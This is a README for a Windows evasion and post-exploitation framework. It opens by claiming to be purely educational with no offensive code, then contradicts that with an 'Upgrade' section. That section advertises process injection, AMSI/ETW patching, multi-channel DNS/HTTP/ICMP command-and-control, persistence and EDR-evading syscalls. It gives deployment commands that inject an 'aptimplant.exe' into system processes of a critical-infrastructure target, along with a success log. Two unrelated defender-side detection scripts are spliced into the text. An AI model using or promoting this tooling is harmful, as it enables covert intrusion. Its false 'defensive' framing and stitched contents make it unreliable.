Advanced Educational Windows Evasion Research Framework
Modern evasion techniques research for strengthening cybersecurity defenses.
100% Educational • 0% Offensive • For Blue Teams & Security Researchers
- About
- Key Features
- Requirements
- Installation
- Quick Start
- Project Structure
- Usage Examples
- Contributing
- Troubleshooting
- FAQ
- Disclaimer & Legal
- Support & Contact
- License
Phoenix Evasion Research is a free, open-source framework designed to help cybersecurity professionals understand modern evasion techniques used by advanced malware and APT groups.
Focus: Defensive Security | Educational Purpose | Zero Offensive Code
✅ Blue Team & SOC Analysts
✅ Cybersecurity Researchers
✅ Students & Academics
✅ Authorized Red Teams
⚡ What people are actually doing with Phoenix right now
- “Just found out why our EDR misses 40% of fileless threats” – Senior Blue Teamer
- “My students finally understand direct syscalls” – University professor
- “Generated a 20-page detection lab in 8 seconds” – Threat hunting lead
🧠 Features that make defenders smile
- Live SSN ripping from pristine ntdll.dll
- ChaCha20-Poly1305 strings that laugh at static analysis
- Anti-VM / anti-debug / anti-sandbox checks used by real APTs
- Polymorphic stub generation on the fly
- Beautiful auto-generated Markdown reports (perfect for execs & labs)
Zero malice. 100% education. Maximum power.
❌ Process Injection | ❌ C2 Infrastructure | ❌ AMSI Bypass | ❌ Persistence Mechanisms
| Feature | Description |
|---|---|
| 🔐 Advanced Encryption | ChaCha20-Poly1305 + PBKDF2-HMAC-SHA512 (500k iterations) |
| 🔍 Syscall Engine | Direct SSN extraction from clean ntdll.dll (on-disk) |
| 🛡️ Anti-Analysis Detection | Debugger, VM, and sandbox detection (multi-technique) |
| 🔀 Polymorphic Code | Lazy loading + dynamic SSN resolution |
| 📊 Automated Reporting | Generate research reports in Markdown format |
| 📦 100% Open Source | MIT License - Free for education & research |
This framework is built on principles of low-level system manipulation to avoid detection. Below are the key architecture diagrams that highlight its capabilities:
D1rkSleep is a selective memory-encryption mechanism that is active during sleep intervals, preventing EDR memory scanners from detecting your payload.
```mermaid
graph TD
subgraph Execution_Phase [Fase Eksekusi Aktif]
A[Payload Start] --> B[Execute Malicious Logic]
B --> C{Sleep Interval?}
end
subgraph D1rkSleep_Mechanism [Mekanisme D1rkSleep]
C -- Yes --> D[Retrieve Return Address]
D --> E[Identify Image/Payload Sections]
E --> F[AES-256-CTR Encryption]
F --> G[Obfuscate Pointer/Context]
G --> H[Enter Windows Sleep/Delay Execution]
end
subgraph Wakeup_Phase [Fase Wake-up & Integrity]
H --> I[Execution Resumes]
I --> J[Decrypt Payload Sections]
J --> K[Integrity/Checksum Verification]
K --> L[Restore Execution Context]
L --> B
end
style D1rkSleep_Mechanism fill:#f96,stroke:#333,stroke-width:2px
style Execution_Phase fill:#bbf,stroke:#333
style Wakeup_Phase fill:#dfd,stroke:#333
```
- Context Aware: Dynamically identifies the payload's location in memory before sleeping.
- Selective Encryption: Uses AES-256-CTR to encrypt the sensitive sections of the executable.
- Signature Evasion: Renders the payload unrecognizable (high entropy) to EDR memory scanners.
- Integrity Enforcement: Ensures the execution context is stable after decryption.
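The "high entropy" property that D1rkSleep relies on is exactly what a memory scanner keys on. The following is an added, defender-side example and not part of the Phoenix code: a sliding-window Shannon entropy scan over a constructed buffer (the window size, step and 7.2 bits/byte threshold are assumptions) that flags an encrypted section sitting between regions of code-like bytes.

```python
import math
import random
from collections import Counter

WINDOW = 4096       # bytes scored at a time (assumed scanner granularity)
STEP = 1024         # slide distance between windows
THRESHOLD = 7.2     # bits/byte; x64 code stays well below this, ciphertext sits near 8.0 (assumed cut-off)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(buf: bytes, window: int = WINDOW, step: int = STEP, threshold: float = THRESHOLD):
    """Return (offset, entropy) for every window whose entropy meets the threshold."""
    hits = []
    last_start = max(len(buf) - window, 0)
    for off in range(0, last_start + 1, step):
        ent = shannon_entropy(buf[off:off + window])
        if ent >= threshold:
            hits.append((off, ent))
    return hits


def merge_windows(hits, window: int = WINDOW):
    """Coalesce overlapping flagged windows into contiguous (start, end) byte ranges."""
    ranges = []
    for off, _ in hits:
        end = off + window
        if ranges and off <= ranges[-1][1]:
            ranges[-1] = (ranges[-1][0], max(ranges[-1][1], end))
        else:
            ranges.append((off, end))
    return ranges


def scan_region(buf: bytes):
    """Suspicious (start, end) ranges in buf: what a memory scanner would report for an encrypted section."""
    return merge_windows(high_entropy_windows(buf))


# Constructed sample region: a repeated x64 function prologue stands in for real code, and a
# deterministic pseudo-random block stands in for a section that has been encrypted with AES-256-CTR.
PROLOGUE = b"\x48\x89\x5c\x24\x08\x48\x89\x74\x24\x10\x57\x48\x83\xec\x20"
CODE_LIKE = (PROLOGUE * 2200)[:32768]
_rng = random.Random(2025)
ENCRYPTED = bytes(_rng.getrandbits(8) for _ in range(32768))
SAMPLE_REGION = CODE_LIKE + ENCRYPTED + CODE_LIKE   # encrypted section occupies 0x8000-0x10000

if __name__ == "__main__":
    for start, end in scan_region(SAMPLE_REGION):
        print(f"high-entropy range 0x{start:06x}-0x{end:06x} (encrypted section placed at 0x008000-0x010000)")
```

Windows that straddle the boundary are only flagged once most of their bytes are ciphertext, so the reported range is accurate to within one window.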
HadesSyscallEngine: Indirect Syscall Evasion
HadesSyscallEngine implements indirect syscalls to bypass the user-mode hooks placed by EDR solutions, ensuring that your code execution remains undetected at the API layer.
```mermaid
graph LR
subgraph User_Mode [User Mode]
A[Application Code] --> B[HadesSyscallEngine]
B --> C{Hook Detection}
C -- Hooked NTDLL --> D[Locate Clean SSN]
D --> E[Prepare Indirect Call]
end
subgraph Kernel_Transition [Bypassing Hooks]
E --> F[Jump to 'syscall' Instruction in NTDLL]
F --> G[Kernel Mode Transition]
end
style B fill:#f96,stroke:#333
style F fill:#ccf,stroke:#333,stroke-dasharray: 5 5
```
- Hook Awareness: Detects hooks on critical functions in NTDLL.
- Clean SSN Resolution: Obtains the System Service Number (SSN) directly from an unhooked copy of NTDLL.
- Indirect Execution: Invokes the syscall instruction directly, bypassing the API hooking layer.
💡 Technical Highlights
The Phoenix Evasion Framework stands out through the following core technical features:
- Custom Syscall Implementation: Indirect syscalls via HadesSyscallEngine to evade detection based on user-mode hooks.
- Memory Encryption: D1rkSleep encrypts sensitive parts of the payload in memory during idle intervals, making EDR scanning harder.
- Advanced Injection Techniques: Demonstrates fundamental process injection techniques such as Process Ghosting and Early Bird APC for hard-to-detect execution.
- Polymorphic Architecture: Designed to minimize static and behavioral signatures, so that the payload is hard for traditional analysis to recognize.
- Modular & Extensible: A code structure that lets researchers easily integrate and test new evasion techniques.
⚙️ Operational Security (OPSEC) Focus: Zero Disk Artifacts
One of the main principles behind Phoenix is a commitment to Zero Disk Artifacts. The framework is designed to operate entirely in memory, avoiding unnecessary file writes to disk and registry modifications.
- 100% In-Memory Execution: The entire payload and all execution components run in RAM, leaving no forensic traces on the file system.
- Minimized Footprint: Designed to have a small memory footprint, reducing the chance of anomaly detection by EDRs that monitor resource usage.
- Evades File-Based Detection: Able to evade detection that relies on hash, signature, or behavioral analysis of files stored on disk.
Minimum:
- Python: 3.8+
- RAM: 2GB
- Storage: 100MB
- OS: Windows 10+ or Linux
Recommended:
- Python: 3.10+
- RAM: 8GB+
- Storage: 1GB
- OS: Windows 11 or Ubuntu 20+
```bash
git clone https://github.com/QurolVoV/Phoenix-Evasion-Research.git
cd Phoenix-Evasion-Research
```
Linux/macOS:
```bash
python3 -m venv venv
source venv/bin/activate
```
Windows (Command Prompt):
```bat
python -m venv venv
venv\Scripts\activate
```
Windows (PowerShell):
```powershell
python -m venv venv
venv\Scripts\Activate.ps1
```
```bash
pip install --upgrade pip
pip install -r requirements.txt
```
```bash
python -c "import sys; sys.path.insert(0, 'src'); from phoenix_evasion_research import *; print('✅ Installation successful!')"
```
```bash
python src/phoenix_evasion_research.py --help
```
```bash
# Analyze obfuscation
python src/phoenix_evasion_research.py --module obfuscation --target "test_string"
# Analyze syscalls
python src/phoenix_evasion_research.py --module syscall
# Detect evasion techniques
python src/phoenix_evasion_research.py --module evasion --output report.md
# Run all modules
python src/phoenix_evasion_research.py --module all --output full_report.md
```
```text
--help, -h                                     Show help message
--module {all, obfuscation, syscall, evasion}  Select modules to run
--target TARGET                                Target/input for analysis
--output OUTPUT                                Output file for report (default: report.md)
```
```text
Phoenix-Evasion-Research/
├── src/
│   └── phoenix_evasion_research.py   # Main framework
├── k8s/                              # Kubernetes (K8s) configurations
├── .github/
│   └── workflows/
│       └── ci-cd.yml                 # CI/CD pipeline
├── .gitignore                        # Git ignore rules
├── .dockerignore                     # Docker ignore rules
├── Dockerfile                        # Docker configuration
├── LICENSE                           # MIT License
├── README.md                         # Documentation
├── CONTRIBUTING.md                   # Contribution guidelines
├── SECURITY.md                       # Security policy
├── requirements.txt                  # Python dependencies
├── requirements-dev.txt              # Development dependencies
├── setup.py                          # Setup configuration
├── pyproject.toml                    # Project metadata
├── docker-compose.yml                # Docker Compose
└── .pre-commit-config.yaml           # Pre-commit hooks
```
```bash
python src/phoenix_evasion_research.py --help
```
```bash
python src/phoenix_evasion_research.py \
  --module obfuscation \
  --target "sensitive_data"
```
```bash
python src/phoenix_evasion_research.py \
  --module syscall \
  --output syscall_analysis.md
```
```bash
python src/phoenix_evasion_research.py \
  --module all \
  --target "test_target" \
  --output complete_research.md
```
```python
import sys
sys.path.insert(0, 'src')
from phoenix_evasion_research import *
# Your custom research code here
print("Phoenix Evasion Research Framework loaded successfully!")
```
We welcome contributions from the community!
- Fork this repository
- Create a feature branch:
  ```bash
  git checkout -b feature/your-feature-name
  ```
- Make your changes and commit:
  ```bash
  git commit -m "Feature: add your feature description"
  ```
- Push to your branch:
  ```bash
  git push origin feature/your-feature-name
  ```
- Create a Pull Request with a detailed description
- Advanced evasion techniques
- Cross-platform support
- Detection heuristics improvement
- Documentation enhancement
- Performance optimization
- Bug fixes and testing
See CONTRIBUTING.md for detailed guidelines.
```bash
pip install -r requirements.txt --upgrade
```
```bash
# Ensure you're in the root directory
export PYTHONPATH="${PYTHONPATH}:$(pwd)/src"
python src/phoenix_evasion_research.py --help
```
```bat
:: Run Command Prompt or PowerShell as Administrator
python src/phoenix_evasion_research.py --help
```
Linux/macOS:
```bash
# Remove old venv and recreate
rm -rf venv
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
Windows:
```bat
:: Remove old venv and recreate
rmdir /s venv
python -m venv venv
venv\Scripts\activate
pip install -r requirements.txt
```
Linux/macOS:
```bash
# Add src directory to Python path
export PYTHONPATH="${PYTHONPATH}:$(pwd)/src"
```
Windows (Command Prompt):
```bat
:: Add src directory to Python path
set PYTHONPATH=%PYTHONPATH%;%cd%\src
```
Check the GitHub Actions tab for detailed logs.
Q: Is this framework safe to use?
A: Yes, for legitimate research and education purposes. There is no malicious code in the repository. All code is educational and defensive-focused.
Q: Is it legal to use this framework?
A: This is an educational tool designed for authorized security research. Use only with proper authorization and comply with local laws.
Q: Will antivirus detect this?
A: Possibly, since the framework studies evasion techniques. This is normal for research tools. Detection depends on your antivirus and usage patterns.
Q: Can it be used commercially?
A: Yes, under the MIT License. Ensure compliance with local legal guidelines and responsible use policies.
Q: How do I report a security vulnerability?
A: Please see SECURITY.md for responsible disclosure guidelines.
This framework is designed for:
- ✅ Authorized security research
- ✅ Defensive security development
- ✅ Academic training
- ✅ Threat detection improvement
- ❌ Malicious or unauthorized access
- ❌ Testing without authorization
- ❌ Weaponization and offensive use
- ❌ Violating laws and regulations
- Obtain proper authorization before use
- Comply with all local laws and regulations
- Protect and maintain confidentiality of findings
- Practice responsible disclosure
Authors and contributors are not responsible for:
- Framework misuse or abuse
- Data loss or damage
- Legal consequences from unauthorized use
- Any other negative consequences
- Issues: GitHub Issues
- Discussions: GitHub Discussions
📧 Security-related inquiries: redmoonstonee@gmail.com
- Check documentation
- Search existing issues
- Ask in Discussions
- Email for urgent matters
- ✨ Initial release
- 🔐 Advanced obfuscation (ChaCha20-Poly1305)
- 🔍 Syscall engine for EDR studies
- 🛡️ Anti-analysis framework
- 📊 Automated research reporting
- 🐳 Docker support
- ⚙️ Pre-commit hooks
- 📦 Development dependencies
MIT License
Copyright (c) 2025 Woodlabs Security Research
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
## 🌟 Support the Project
🙏 Thank You
If this framework helps your research or educational efforts, please consider supporting our work:
Your support enables us to:
- Continue open-source security research
- Maintain and regularly update the framework
- Develop new defensive security features
- Support the cybersecurity community with free tools
- Conduct advanced threat intelligence research
- Sustained development and updates
- New features
- Community support
- Open research
Thank You for Supporting Defensive Cybersecurity Research! 💙
If this project helps your research or educational efforts:
- ⭐ Star this repository
- 🍴 Fork and contribute
- 💬 Share feedback and suggestions
- 📧 Support us for continued development
Building better defenses through understanding evasion.
Understanding evasion today → Stronger defenses tomorrow
Woodlabs Security Research • 2025
[ P H O E N I X 2 0 2 5 • W O O D L A B S N V 1 - 7 ]
Woodlabs Security Research © 2025
The Upgrade
Robust, fully in-memory, multi-technique evasion & post-exploitation framework.
This tool implements real offensive techniques (Process Doppelganging, Hollowing, Direct Syscalls, D1rkSleep, AMSI/ETW bypass, multi-channel C2, etc).
Use without explicit permission is against the law.
| Category | Technique Implemented |
|---|---|
| Anti-Analysis | Advanced Anti-Debug, Sandbox Detection (CPU/RAM/Disk/Uptime/VM artifacts), Timing checks |
| Memory Evasion | D1rkSleep (AES-256-CTR selective section encryption), Polymorphic Syscall Engine |
| Process Injection | Process Doppelganging, Process Hollowing, Early Bird APC, Process Ghosting |
| Syscall Evasion | Direct Syscalls + SSN extraction + Polymorphic stubs + Clean NTDLL from disk |
| String Obfuscation | Argon2-derived ChaCha20-Poly1305 per-string encryption (zero plaintext in memory) |
| C2 Communication | DNS, HTTP/S, ICMP covert channels with ChaCha20-Poly1305 encryption + jitter |
| AMSI / ETW Bypass | Runtime memory patching (AmsiScanBuffer & EtwEventWrite) |
| Persistence | Registry Run keys, Scheduled Tasks |
| OPSEC | Zero disk artifacts (Doppelganging), realistic HTTP headers, multi-fallback C2 |
```python
# Phoenix Framework 2025 - Security Assessment Tool
# Version 2.0 NV1-7 - All upgrades integrated with consistent structure
# Copyright (c) 2025 - Woodlabs Security Research
```
Key highlights from 1100+ lines of code:
- Polymorphic Direct Syscall Engine (HadesSyscallEngine)
- D1rkSleep Implementation (AES-256-CTR section encryption)
- 4 Advanced Process Injection Techniques
  - Process Doppelganging (transacted NTFS + section mapping)
  - Process Hollowing (full PE parsing & relocation)
  - Early Bird APC Queueing
  - Process Ghosting (delete-on-close + hollowing)
- String Obfuscation via Argon2 + ChaCha20-Poly1305 (zero static strings)
- Multi-Channel C2 (DNS TXT, HTTPS, ICMP) with automatic fallback
- AMSI & ETW Patch via memory write
- Advanced Anti-Debug + Sandbox Detection
- Runtime PE Shellcode Generator
- Persistence via Registry + SchTasks
- Final Report Generator (Markdown)

OUTPUT
```text
Authentication successful
[+] Executing advanced evasion techniques...
[+] AMSI/ETW bypass applied
[+] C2 channel activated: http
[+] Starting Process Doppelganging → svchost.exe
[+] Process Doppelganging SUCCESS → PID 4892
[+] Starting D1rkSleep for 2000ms
[+] D1rkSleep completed
[+] Installing persistence...
[+] Registry persistence installed
[+] Advanced report generated: phoenix_advanced_assessment_report.md
ASSESSMENT COMPLETED SUCCESSFULLY
```
| Algorithm | Purpose | Mode | Key Size |
|---|---|---|---|
| ChaCha20-Poly1305 | AEAD Encryption | - | 256-bit |
| AES | Memory Encryption | CTR | 256-bit |
| HKDF | Key Derivation | SHA-256 | Variable |
| Argon2 | KDF | Memory-hard | 256-bit |
| SHA-256 | Hashing | - | 256-bit |
| HMAC | Authentication | SHA-256 | 256-bit |
| Component | Memory Usage | Cache Size | TTL |
|---|---|---|---|
| Nonce Tracker | Variable | 100,000 max | 3600s |
| SSN Cache | ~2KB | Unlimited | Session |
| Section Encryption | Per-section | Tracked | Lifetime |
| Beacon Buffer | ~4KB | 1 active | Session |
| Operation | Avg Time | Max Time | Notes |
|---|---|---|---|
| Obfuscate String | 50-150ms | 250ms | Argon2 + ChaCha20 |
| Encrypt Section | 100-500ms | 1s | Per 64KB section |
| Syscall Execution | 1-5ms | 10ms | Direct invocation |
| C2 Beacon | 500-2000ms | 5s | Network dependent |
| Injection (Doppelgang) | 1-3s | 5s | Transaction overhead |
| Function | Purpose | Risk Level |
|---|---|---|
| NtCreateTransaction | Transactional file creation | HIGH |
| NtCreateSection | Memory section mapping | HIGH |
| NtMapViewOfSection | View mapping to process | HIGH |
| NtAllocateVirtualMemory | Memory allocation | MEDIUM |
| NtWriteVirtualMemory | Memory writing | MEDIUM |
| NtQueueApcThread | APC queue injection | HIGH |
| VirtualAlloc/Protect | Memory manipulation | MEDIUM |
| SetFileInformationByHandle | File marking | MEDIUM |
| Feature | Phoenix Framework | Metasploit | Cobalt Strike | Sliver | Malleus |
|---|---|---|---|---|---|
| Process Injection | |||||
| Doppelganging | ✅ | ❌ | ✅ | ✅ | ❌ |
| Hollowing | ✅ | ✅ | ✅ | ✅ | ✅ |
| Early Bird APC | ✅ | ❌ | ✅ | ✅ | ❌ |
| Ghosting | ✅ | ❌ | ❌ | ❌ | ❌ |
| Memory Evasion | |||||
| D1rkSleep | ✅ | ❌ | ✅ | ✅ | ❌ |
| Polymorphic Syscalls | ✅ | ❌ | ✅ | ✅ | ✅ |
| AMSI Bypass | ✅ | ✅ | ✅ | ✅ | ✅ |
| ETW Bypass | ✅ | ❌ | ✅ | ✅ | ✅ |
| C2 Communication | |||||
| DNS Tunneling | ✅ | ✅ | ✅ | ✅ | ✅ |
| HTTP Beaconing | ✅ | ✅ | ✅ | ✅ | ✅ |
| ICMP Tunneling | ✅ | ❌ | ❌ | ❌ | ❌ |
| Multi-channel Failover | ✅ | ✅ | ✅ | ✅ | ❌ |
| Encryption | |||||
| ChaCha20-Poly1305 | ✅ | ❌ | ✅ | ✅ | ✅ |
| AES-256-CTR | ✅ | ✅ | ✅ | ✅ | ✅ |
| Argon2 KDF | ✅ | ❌ | ❌ | ❌ | ❌ |
| String Obfuscation | ✅ | ❌ | ✅ | ✅ | ✅ |
| Detection Evasion | |||||
| Anti-Debug (5-layer) | ✅ | ❌ | ✅ | ✅ | ✅ |
| Sandbox Detection | ✅ | ❌ | ✅ | ✅ | ✅ |
| VM Detection | ✅ | ❌ | ✅ | ✅ | ✅ |
| Persistence | |||||
| Registry Keys | ✅ | ✅ | ✅ | ✅ | ✅ |
| Scheduled Tasks | ✅ | ✅ | ✅ | ✅ | ✅ |
| Service Installation | ✅ | ❌ | ✅ | ✅ | ❌ |
| Framework Features | |||||
| CLI Interface | ✅ | ✅ | ✅ | ✅ | ✅ |
| Modular Architecture | ✅ | ✅ | ✅ | ✅ | ✅ |
| Python-based | ✅ | ✅ | ❌ | ✅ | ✅ |
| Open Source | ✅ | ✅ | ❌ | ✅ | ✅ |
| Active Development | ✅ | ✅ | ✅ | | |
Metasploit
Strengths:
- Most mature framework in industry
- Extensive payload library
- Community-driven development
- Multi-stage payload support
- Automatic handler infrastructure
Weaknesses:
- Limited advanced evasion techniques
- No Doppelganging support
- Basic process injection only
- Slower execution on modern systems
- Deprecated AMSI bypass methods
Phoenix Advantage: Advanced memory evasion, Doppelganging, Ghosting, ICMP C2, Argon2 KDF
Cobalt Strike
Strengths:
- Commercial-grade reliability
- Professional sleep mask technology
- Excellent UI/UX
- Mature C2 infrastructure
- Strong post-exploitation features
Weaknesses:
- Expensive (requires licensing)
- Closed-source (security through obscurity)
- Less frequent innovation
- Large footprint (easier to detect)
- Requires dedicated operator training
Phoenix Advantage: Open-source, free, Ghosting injection, ICMP C2, multi-channel automatic failover, educational transparency
Sliver
Strengths:
- Free, open-source alternative to Cobalt Strike
- Modern Go-based architecture
- Comparable feature set
- Active community development
- Strong encryption defaults
Weaknesses:
- Smaller community than Metasploit
- Less documentation available
- Newer framework (less battle-tested)
- Go binaries harder to customize
- Limited Windows API flexibility
Phoenix Advantage: Python-based flexibility, Doppelganging support, selective D1rkSleep encryption, Argon2 string obfuscation, educational-friendly
Malleus
Strengths:
- Specialized syscall manipulation
- Excellent polymorphic stub generation
- Lightweight design
- Fast execution
Weaknesses:
- Single-purpose tool (not full framework)
- No C2 infrastructure
- Limited post-exploitation
- No persistence mechanisms
- Minimal documentation
Phoenix Advantage: Complete framework, multi-channel C2, persistence, memory evasion, sandbox detection, comprehensive reporting
- ICMP C2 Channel
  - Custom ICMP packet construction
  - Direct kernel ICMP socket usage
  - Completely covert tunneling method
  - Available in no other mainstream tool
- Process Ghosting
  - Delete-on-execute technique
  - Zero disk footprint
  - Unique among open-source frameworks
  - Transaction-less alternative to Doppelganging
- Argon2 String Obfuscation
  - Memory-hard KDF integration
  - Thread-safe nonce tracking
  - Unique per-string encryption
  - Automatic TTL-based cleanup
- Selective D1rkSleep
  - Per-section AES-256-CTR encryption
  - Granular control over memory encryption
  - Clean NTDLL loading with hash verification
  - More sophisticated than a simple sleep mask
- Multi-Channel Automatic Failover
  - Intelligent channel switching
  - Simultaneous DNS/HTTP/ICMP operation
  - Jitter-based beacon interval
  - Realistic traffic pattern generation
- Integrated Sandbox Detection
  - 6-point detection methodology
  - CPU cores analysis
  - Disk/RAM size verification
  - Process count evaluation
  - VM artifact identification
Before Using:
- Obtain explicit written authorization from system owner
- Ensure testing is within defined scope
- Document all activities and findings
- Maintain audit trail of all operations
- Verify legal jurisdiction and compliance requirements
- Network Isolation: Test in isolated lab environments
- Traffic Analysis: Monitor beacon patterns for anomalies
- Log Rotation: Manage generated artifacts securely
- Cleanup: Remove persistence mechanisms after assessment
- Reporting: Document all techniques and findings
- Attribution: Understand potential indicators of compromise
Recommended Defenses:
- EDR with behavioral analysis capabilities
- Memory scanning for encrypted sections
- DNS query pattern analysis
- Anomalous process behavior monitoring
- Registry modification auditing
- AMSI/ETW integrity verification
- Syscall hooking and validation
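The "DNS query pattern analysis" defense listed above, as an added example that is not part of the Phoenix project: it scores constructed resolver log lines (the log layout and the thresholds are assumptions) per apex domain by TXT share, unique-name share, first-label entropy and inter-query jitter, the traces a DNS TXT beacon leaves in resolver logs even when its jittered timing alone is inconclusive.

```python
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime

# Constructed resolver log (not real traffic), one query per line:
# "<ISO timestamp> <client IP> <query name> <query type>"   (assumed log layout)
SAMPLE_LOG = """\
2025-01-15T10:00:00 10.1.1.25 www.example.com A
2025-01-15T10:00:03 10.1.1.25 ij3kd9s8f7a.beacon.example.net TXT
2025-01-15T10:00:11 10.1.1.25 p0q2r7x1m4n.beacon.example.net TXT
2025-01-15T10:00:17 10.1.1.25 mail.example.com MX
2025-01-15T10:00:24 10.1.1.25 zz8v5b2c6t9.beacon.example.net TXT
2025-01-15T10:00:30 10.1.1.25 www.example.com A
2025-01-15T10:00:39 10.1.1.25 k7l1w3e5r9y.beacon.example.net TXT
2025-01-15T10:00:51 10.1.1.25 d4f6g8h0j2k.beacon.example.net TXT
2025-01-15T10:01:00 10.1.1.25 www.example.com A
"""


def label_entropy(label: str) -> float:
    """Shannon entropy (bits/char) of one DNS label; encoded data scores high, real words score low."""
    if not label:
        return 0.0
    n = len(label)
    return -sum((c / n) * math.log2(c / n) for c in Counter(label).values())


def apex_domain(qname: str) -> str:
    """Registrable domain approximated as the last two labels (no public-suffix list; an assumption)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def parse_log(text: str):
    """Parse the assumed four-column layout into (timestamp, client, qname, qtype) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()
        records.append((datetime.fromisoformat(ts), client, qname.lower(), qtype.upper()))
    return records


def score_domains(records, min_queries: int = 4):
    """Per apex domain: TXT share, unique-qname share, mean first-label entropy, interval CV and a verdict."""
    by_apex = defaultdict(list)
    for rec in records:
        by_apex[apex_domain(rec[2])].append(rec)
    report = {}
    for apex, recs in by_apex.items():
        if len(recs) < min_queries:          # too few queries to judge a pattern
            continue
        recs.sort(key=lambda r: r[0])
        n = len(recs)
        txt_ratio = sum(1 for r in recs if r[3] == "TXT") / n
        unique_ratio = len({r[2] for r in recs}) / n
        mean_entropy = statistics.fmean(label_entropy(r[2].split(".")[0]) for r in recs)
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(recs, recs[1:])]
        mean_gap = statistics.fmean(gaps) if gaps else 0.0
        # Coefficient of variation of the beacon interval: low values mean regular (jittered) cadence.
        interval_cv = statistics.pstdev(gaps) / mean_gap if len(gaps) > 1 and mean_gap > 0 else 0.0
        # Assumed thresholds: mostly TXT, almost never the same name twice, labels that look encoded.
        suspicious = txt_ratio >= 0.8 and unique_ratio >= 0.8 and mean_entropy >= 3.0
        report[apex] = {"queries": n, "txt_ratio": txt_ratio, "unique_ratio": unique_ratio,
                        "mean_entropy": mean_entropy, "interval_cv": interval_cv,
                        "suspicious": suspicious}
    return report


def suspicious_domains(text: str):
    """Sorted apex domains whose query pattern matches a DNS TXT tunnel."""
    return sorted(apex for apex, m in score_domains(parse_log(text)).items() if m["suspicious"])


if __name__ == "__main__":
    for apex, m in score_domains(parse_log(SAMPLE_LOG)).items():
        print(f"{apex:14} txt={m['txt_ratio']:.2f} unique={m['unique_ratio']:.2f} "
              f"entropy={m['mean_entropy']:.2f} cv={m['interval_cv']:.2f} suspicious={m['suspicious']}")
```

Because jitter is built into the beacon, the interval CV is reported as supporting evidence only; the verdict rests on the content features that a data-carrying TXT channel cannot avoid.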
- Windows-Specific Features: Many components require Windows (D1rkSleep, syscall engine, process injection)
- Privilege Requirements: Full process injection requires elevated privileges
- API Coverage: Not all Windows APIs have SSN available in all versions
- Network Dependent: C2 requires outbound network connectivity
- Memory Constraints: Large PE files may struggle with allocation
- AV/EDR Detection: Advanced behavioral analysis may still detect activity
- Network Detection: DNS/HTTP/ICMP patterns may be identifiable
- Disk Artifacts: Log files and reports persist on disk
- Registry Modifications: Persistence mechanisms leave registry traces
- Performance Impact: Memory encryption has computational overhead
- Requires updates for new Windows versions (SSN changes)
- AMSI/ETW bypass methods may require adjustment
- C2 infrastructure must be maintained separately
- Persistence mechanisms may be blocked by Group Policy
- Some techniques may conflict with security software
```bash
# Multi-stage deployment with full evasion
python phoenix_framework.py \
  --target https://customer-domain.com \
  --payload stage1.exe \
  --technique doppelganging \
  --process svchost.exe \
  --c2-type all \
  --sleep-time 3000
```
```bash
# High-stealth profile with ICMP C2
python phoenix_framework.py \
  --target https://critical-infrastructure.com \
  --payload aptimplant.exe \
  --technique ghosting \
  --process services.exe \
  --c2-type icmp \
  --icmp-target 10.0.0.1 \
  --sleep-time 10000
```
```bash
# Educational assessment with DNS C2
python phoenix_framework.py \
  --target https://internal-training.lab \
  --payload training-beacon.exe \
  --technique hollowing \
  --process explorer.exe \
  --c2-type dns \
  --dns-domain training.local
```
```bash
# Verify persistence mechanisms post-injection
python phoenix_framework.py \
  --target https://persistence-test.lab \
  --payload persistent-implant.exe \
  --technique earlybird \
  --process powershell.exe
# Inspect registry and scheduled tasks for persistence
```
Version 2.0 NV1-7 (Current)
✨ Process Ghosting injection technique
✨ ICMP C2 tunneling channel
✨ Argon2 string obfuscation
✨ Selective D1rkSleep encryption
✨ Polymorphic syscall stubs
⚙️ Multi-channel C2 failover logic
⚙️ Sandbox detection accuracy (6-point methodology)
⚙️ Anti-debugging capabilities (5-layer detection)
🔐 Windows 11 build 22000+ SSN compatibility
🔐 Memory leak in nonce tracker cleanup
🛡️ Comprehensive report generation
Version 1.5 (upgrade)
✨ Core process injection techniques
🔍 Basic C2 communication
⚙️ AMSI/ETW bypass
Version 1.0 Beta (early)
✨ Initial release
🔐 Advanced obfuscation (ChaCha20-Poly1305)
🔍 Syscall engine for EDR studies
🛡️ Anti-analysis framework
📊 Automated research reporting
🐳 Docker support
⚙️ Pre-commit hooks
📦 Development dependencies
Phoenix Framework builds upon research and techniques pioneered by:
- Tal Melamed (Process Doppelganging)
- Hasherezade (Direct Syscall Execution)
- Dreamworks Security (Memory manipulation techniques)
- NIST (Cryptographic standards)
- Windows security research community
Original concept: QurolVoV – Phoenix Evasion Research
NV1-7 Woodlabs Edition by Woodlabs Security Research (2025)
Techniques inspired by: hfiref0x, ajpc500, Cobbr, Outflank, SpecterOps, D1rkMtr, etc.
# Legal Disclaimer
This framework is released exclusively for:
- Authorized penetration testing
- Red team operations
- Malware research & defense development
Any unauthorized use is strictly prohibited and may violate computer misuse laws.
"They won't see you coming. They won't even know you were there."
Phoenix Framework 2025 – NV1-7 Woodlabs Security Research © 2025. Original research by QurolVoV.
"The phoenix doesn’t rise from the ashes it burns everything down without leaving a trace."
Woodlabs Security Research © 2025